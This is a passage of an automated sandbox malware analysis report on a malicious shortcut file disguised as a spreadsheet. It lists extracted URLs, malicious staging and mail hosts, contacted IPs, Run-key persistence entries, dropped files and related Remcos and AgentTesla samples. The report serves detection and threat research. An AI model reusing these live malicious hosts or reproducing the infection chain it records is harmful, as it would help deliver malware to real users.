                                    http://r3.o.lencr.org0bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.sessosesso.it/assets/aw/yt.htaHmshta.exe, 00000009.00000002.1863790955.0000019AC1850000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://sessosesso.itpowershell.exe, 00000011.00000002.1450441892.0000029E1A4D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 1%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://sectigo.com/CPS0uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.sessosesso.itpowershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmptrue
                                        • 2%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://account.dyn.com/bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmptrue
                                          • URL Reputation: malware
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://go.micropowershell.exe, 0000000F.00000002.1678474741.000002B0011BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.sessosesso.it/assets/aw/yt.htaC:mshta.exe, 00000009.00000002.1863133474.0000019AC1680000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://contoso.com/Iconpowershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000E.00000003.1320362193.0000021C38C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.ver)svchost.exe, 0000000E.00000002.2531370506.0000021C38E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              https://www.sessosesso.it/assets/aw/Book1.xlsxpowershell.exe, 00000011.00000002.1450441892.0000029E1A557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.sessosesso.it/assets/aw/yt.hta...-mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://mail.irmaklarpaslanmaz.com.trbwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://r3.i.lencr.org/0obwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.sessosesso.it/assets/aw/yt.hta...mshta.exe, 00000009.00000002.1864667684.000001A2C42A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://g.live.com/odclientsettings/Prod1C:svchost.exe, 0000000E.00000003.1320362193.0000021C38CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=uc.exe, 00000013.00000002.1500694013.00000000025D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://aka.ms/pscore68powershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.sessosesso.it/assets/aw/yt.htaLMEMXmshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.apache.opowershell.exe, 0000000F.00000002.1839645117.000002B07C378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.pmail.comuc.exe, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000000.1494201950.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 00000019.00000000.1623023662.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 0000001B.00000000.1707510490.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif.19.drfalse
                                                        		high
                                                        http://ocsp.sectigo.com0Cuc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://onedrive.live.com/downlouc.exe, 00000013.00000002.1500694013.00000000025ED000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://zyupsq.by.files.1drv.com/y4meSWi_sxRIVEad6REzmio40CREEc5i8wX7nys_a0wT5VjuHcwzIZewYF7haE8C4Cuuc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            13.107.139.11
                                                            		dual-spov-0006.spov-msedge.netUnited States
                                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            192.185.124.132
                                                            		mail.irmaklarpaslanmaz.com.trUnited States
                                                            		46606UNIFIEDLAYER-AS-1UStrue
                                                            89.46.106.29
                                                            		sessosesso.itItaly
                                                            		31034ARUBA-ASNITtrue

                                                            Private

                                                            IP
                                                            127.0.0.1

                                                            General Information

                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1430751
                                                            Start date and time:2024-04-24 06:44:15 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 12m 10s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:31
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:FT. 40FE CNY .xlsx.lnk
                                                            Detection:MAL
                                                            Classification:mal100.rans.troj.spyw.evad.winLNK@26/26@5/4
                                                            EGA Information:
                                                            • Successful, ratio: 71.4%
                                                            HCA Information:
                                                            • Successful, ratio: 96%
                                                            • Number of executed functions: 155
                                                            • Number of non-executed functions: 50
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .lnk

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 184.28.122.106, 13.107.42.12
                                                            • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, fs.microsoft.com, odc-by-files-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, l-0003.l-msedge.net, e16604.g.akamaiedge.net, by-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-by-files-geo.onedrive.akadns.net, prod.fs.microsoft.com.akadns.net
                                                            • Execution Graph export aborted for target mshta.exe, PID 7260 because there are no executed function
                                                            • Execution Graph export aborted for target powershell.exe, PID 7688 because it is empty
                                                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            06:45:14API Interceptor95x Sleep call for process: powershell.exe modified
                                                            06:45:18API Interceptor2x Sleep call for process: svchost.exe modified
                                                            06:45:19API Interceptor1x Sleep call for process: mshta.exe modified
                                                            06:45:30API Interceptor2x Sleep call for process: uc.exe modified
                                                            08:24:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ucvuiswb C:\Users\Public\Ucvuiswb.url
                                                            08:24:36API Interceptor40077x Sleep call for process: bwsiuvcU.pif modified
                                                            08:24:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ucvuiswb C:\Users\Public\Ucvuiswb.url
                                                            08:24:44API Interceptor2x Sleep call for process: Ucvuiswb.PIF modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            13.107.139.11VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                              https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22)Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                  Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                    ORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                      20240416-703661.cmdGet hashmaliciousDBatLoaderBrowse
                                                                        20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                          disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                            Oeyrmdo.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              z15ORDERBR2024-B001054840.vbsGet hashmaliciousUnknownBrowse
                                                                                89.46.106.29#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkGet hashmaliciousUnknownBrowse

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  sessosesso.it#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 89.46.106.29
                                                                                  www.sessosesso.it#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 89.46.106.29
                                                                                  dual-spov-0006.spov-msedge.netHFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                  • 13.107.137.11
                                                                                  payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                  • 13.107.137.11
                                                                                  VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                  • 13.107.139.11
                                                                                  pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                  • 13.107.137.11
                                                                                  https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22)Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                  • 13.107.139.11
                                                                                  UGS - CRO REQ - KHIDUBAI (OPL-841724).scrGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                  • 13.107.137.11
                                                                                  SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                  • 13.107.137.11
                                                                                  XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                  • 13.107.139.11
                                                                                  2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                  • 13.107.137.11
                                                                                  Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                  • 13.107.139.11

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  ARUBA-ASNIT#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 89.46.106.29
                                                                                  2x6j7GSmbu.exeGet hashmaliciousFormBookBrowse
                                                                                  • 62.149.189.71
                                                                                  EYhvUxUIsT.elfGet hashmaliciousMiraiBrowse
                                                                                  • 95.110.130.125
                                                                                  2EFEN3j6ml.elfGet hashmaliciousUnknownBrowse
                                                                                  • 80.211.52.147
                                                                                  PhvvLCLFym.elfGet hashmaliciousMiraiBrowse
                                                                                  • 95.110.143.4
                                                                                  HfuP5Csj29.elfGet hashmaliciousMiraiBrowse
                                                                                  • 31.14.139.42
                                                                                  UGXRHW5XnG.elfGet hashmaliciousMiraiBrowse
                                                                                  • 217.73.230.186
                                                                                  Gq730kmpiE.elfGet hashmaliciousUnknownBrowse
                                                                                  • 188.213.171.76
                                                                                  uvaXiyELu9.elfGet hashmaliciousMiraiBrowse
                                                                                  • 212.237.50.240
                                                                                  lUJIhHyHmC.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 5.249.139.193
                                                                                  UNIFIEDLAYER-AS-1USCREDIT NOTE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 192.185.129.60
                                                                                  Total Invoices.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 192.185.129.60
                                                                                  knfV5IVjEV.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 162.241.216.65
                                                                                  http://www.noahsarkademy.comGet hashmaliciousUnknownBrowse
                                                                                  • 69.49.230.31
                                                                                  CR-FEDEX_TN-775720741041.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 192.185.13.234
                                                                                  Wire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 162.144.15.164
                                                                                  DHL_RF_20200712_BN_OTN 0095673441.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 192.185.13.234
                                                                                  https://c8rzg8yq.r.us-east-1.awstrack.me/L0/https:%2F%2Fimaot.co.il%2FContentArea%2FBannerClick%3FBannerId=437%26BannerType=CookbookBanner%26ContentAreaId=74%26SiteUrl=mexperiencia.com%2Felvisa%2F451c858f52d4a1deb2b006143366fdc7%2F6VrgwA%2FcnRpdUB6ZW5kZXNrLmNvbQ==/1/0100018ef745f143-c3ec9f00-7fd4-48c1-9788-f0017cd20054-000000/By5Tv4iHSsE-ml_PGFCkji_Ea6g=370Get hashmaliciousUnknownBrowse
                                                                                  • 162.241.225.201
                                                                                  DHL INVOICE.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 192.185.171.184
                                                                                  PO No. 2430800015.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 162.241.225.141
                                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUS3Shape Unite Installer.exeGet hashmaliciousUnknownBrowse
                                                                                  • 40.67.232.186
                                                                                  OHkRFujs2m.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.208.16.94
                                                                                  SecuriteInfo.com.Trojan.MSIL.zgRAT.Heur.21652.15881.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                  • 13.107.213.69
                                                                                  https://wmicrosouab-4ba8.udydzj.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 13.107.213.69
                                                                                  https://uqgekpc20qn1.azureedge.net/6466/Get hashmaliciousTechSupportScamBrowse
                                                                                  • 13.107.213.69
                                                                                  https://netorg442802-my.sharepoint.com/:b:/g/personal/darek_daronto_com/EeXtnEaZ3XJBqGk13it6odUB-K9vuYAC7zp7SfyciZ3BpQ?e=nkKu2wGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                  • 13.89.178.26
                                                                                  https://netorg442802-my.sharepoint.com/:b:/g/personal/darek_daronto_com/EeXtnEaZ3XJBqGk13it6odUB-K9vuYAC7zp7SfyciZ3BpQ?e=nkKu2wGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.136.10
                                                                                  https://condoresorts.com/Get hashmaliciousUnknownBrowse
                                                                                  • 13.107.246.69
                                                                                  https://u44058082.ct.sendgrid.net/ls/click?upn=u001.wjMLvmoK1OC9dTKy5UL4VbqcIJmZWkGKJypB0ZF6j6rXk8HVnxe0g2af-2BenroUoONz6EEWthgE-2Bi2vVRUosKTZRVQ5v63hCdxrdKCztVooIv51imK8tr-2Bb3beAsH6u-2FNluJlUKmd7nST-2B9m-2Bl2Rgv4y6uHLimO0TjhZzZ-2F-2BDlllJQne3tT99z6x4W12pJpddTL-2BoJ2-2Bdo6961pFN3dV2Rg-3D-3DeWGT_h-2FW4DSvZGhKY-2FmU3Rq-2F3L-2FXo2OZSHdaVvlpgAgHQWDXPYB9CNYi-2FcvonFCbsEhjt9RP-2BQa7dTwbMJOOaP3JRnMW6mQAitl6qAb1EkaAR-2BmnZDE6Bi3ooqtCrrMW-2F3TPNMK3AVi1YKIdTOZivmUJGaXdrtbqCykfnTTkN9KMRy80rdRqf6LWUCYWGeeaXb-2BD6jokMbr-2FaJKvKMHDNWAfHyhaE6QO9pw7souFUseKb40g-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 52.96.189.2
                                                                                  zlONcFaXkc.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                                                                  • 23.101.168.44

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0eDHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 89.46.106.29
                                                                                  G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 89.46.106.29
                                                                                  Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 89.46.106.29
                                                                                  purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 89.46.106.29
                                                                                  PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 89.46.106.29
                                                                                  3Shape Unite Installer.exeGet hashmaliciousUnknownBrowse
                                                                                  • 89.46.106.29
                                                                                  ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                  • 89.46.106.29
                                                                                  ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                  • 89.46.106.29
                                                                                  X1.exeGet hashmaliciousXWormBrowse
                                                                                  • 89.46.106.29
                                                                                  Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                  • 89.46.106.29
                                                                                  a0e9f5d64349fb13191bc781f81f42e1OHkRFujs2m.exeGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.139.11
                                                                                  file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                  • 13.107.139.11
                                                                                  z56NF-Faturada-23042024.msiGet hashmaliciousMicroClipBrowse
                                                                                  • 13.107.139.11
                                                                                  768.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.139.11
                                                                                  Gam.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.139.11
                                                                                  szamla_sorszam_8472.xlsmGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.139.11
                                                                                  iPUk65i3yI.exeGet hashmaliciousLummaCBrowse
                                                                                  • 13.107.139.11
                                                                                  asbpKOngY0.exeGet hashmaliciousLummaCBrowse
                                                                                  • 13.107.139.11
                                                                                  VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                  • 13.107.139.11
                                                                                  https://www.epa.gov/climateleadership/simplified-ghg-emissions-calculatorGet hashmaliciousUnknownBrowse
                                                                                  • 13.107.139.11
                                                                                  37f463bf4616ecd445d4a1937da06e19DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 89.46.106.29
                                                                                  G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  • 89.46.106.29
                                                                                  Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                  • 89.46.106.29
                                                                                  #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 89.46.106.29
                                                                                  181_960.msiGet hashmaliciousUnknownBrowse
                                                                                  • 89.46.106.29
                                                                                  UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 89.46.106.29
                                                                                  3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                  • 89.46.106.29
                                                                                  mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 89.46.106.29
                                                                                  JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 89.46.106.29
                                                                                  AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  • 89.46.106.29

                                                                                  Dropped Files

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  C:\Users\Public\Libraries\easinvoker.exeHFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                      VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                        SecuriteInfo.com.Win32.RATX-gen.9491.24773.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                          Purchase order.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            Quotation 20242204.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                              pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                  2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                      C:\Users\Public\Libraries\bwsiuvcU.pifORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
